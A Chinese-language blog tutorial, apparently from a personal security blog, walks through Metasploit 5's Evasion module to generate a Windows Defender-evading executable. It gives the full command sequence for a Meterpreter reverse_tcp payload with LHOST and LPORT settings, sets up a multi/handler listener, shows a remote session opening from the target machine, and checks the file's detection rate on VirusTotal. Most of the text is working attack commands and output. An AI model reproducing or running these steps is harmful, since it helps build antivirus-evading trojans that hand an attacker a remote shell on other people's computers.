使用metasploit中Evasion模組

摘要： 簡介 幾天前我說了kali這次更新我最關心的是metasploit升級到了5.0，5.0中有一個新的模組叫Evasion模組，這個模組可以輕鬆的建立反防毒軟體的木馬，今天我們就來試一試 操作 首先開啟metasploit msfconsole 你會看...

簡介

幾天前我說了kali這次更新我最關心的是metasploit升級到了5.0，5.0中有一個新的模組叫Evasion模組，這個模組可以輕鬆的建立反防毒軟體的木馬，今天我們就來試一試

操作

首先開啟metasploit

msfconsole

你會看到下面這個介面

➜~ msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.



.:okOOOkdc''cdkOOOko:.
.xOOOOOOOOOOOOccOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk,,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post]
+ -- --=[ 541 payloads - 44 encoders - 10 nops]
+ -- --=[ 2 evasion]
+ -- --=[ ** This is Metasploit 5 development branch **]

之後使用evasion模組，首先看看有什麼evasion模組

msf5 > show evasion

evasion
=======

NameDisclosure DateRankCheckDescription
---------------------------------------
windows/windows_defender_exenormalNoMicrosoft Windows Defender Evasive Executable
windows/windows_defender_js_htanormalNoMicrosoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe這個模組

use windows/windows_defender_exe

檢視要配置的引數

show options

msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

NameCurrent SettingRequiredDescription
--------------------------------------
FILENAMEoDlIipoP.exeyesFilename for the evasive file (default: random)


Evasion target:

IdName
------
0Microsoft Windows

就一個檔名引數可以配置

set FILENAME bboysoul.exe

之後使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

設定埠和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木馬檔案

exploit

之後開啟一個監聽埠

use multi/handler

設定payload

set payload windows/meterpreter/reverse_tcp

設定主機和埠

set LHOST 10.10.10.186

set LPORT 4444

執行

exploit

接著我們把生成出來的木馬在遠端要被控制的windows機器上執行我們這裡就可以接收到這個回話了

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.186:4444

^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常規操作，之後我們掃描病毒

開啟

www.virustotal.com

放入檔案掃描

只有33個病毒引擎掃描出來了，說明還可以

歡迎關注Bboysoul的部落格 www.bboysoul.com

Have Fun